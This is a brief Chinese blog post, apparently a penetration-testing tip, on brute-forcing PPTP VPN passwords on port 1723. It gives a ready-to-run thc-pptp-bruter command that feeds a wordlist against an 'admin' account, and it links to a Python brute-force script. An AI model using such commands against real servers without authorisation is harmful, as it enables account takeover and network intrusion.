Myluzh Blog

Strive to become a dream architect.

PPTP口令爆破

发布时间: 2021-8-29 文章作者: myluzh 分类名称: SECURE


PPTP服务器默认开放1723端口
0x01 PPTP brute forcer
使用PPTP brute forcer,kali自带
源代码:https://github.com/BlackArch/thc-pptp-bruter
命令如下:
cat wordlist.txt | thc-pptp-bruter -u admin 192.168.1.8
0x02 python脚本
https://github.com/3gstudent/Homework-of-Python/blob/master/pptp_password_hack.py

标签: pptp 爆破

发表评论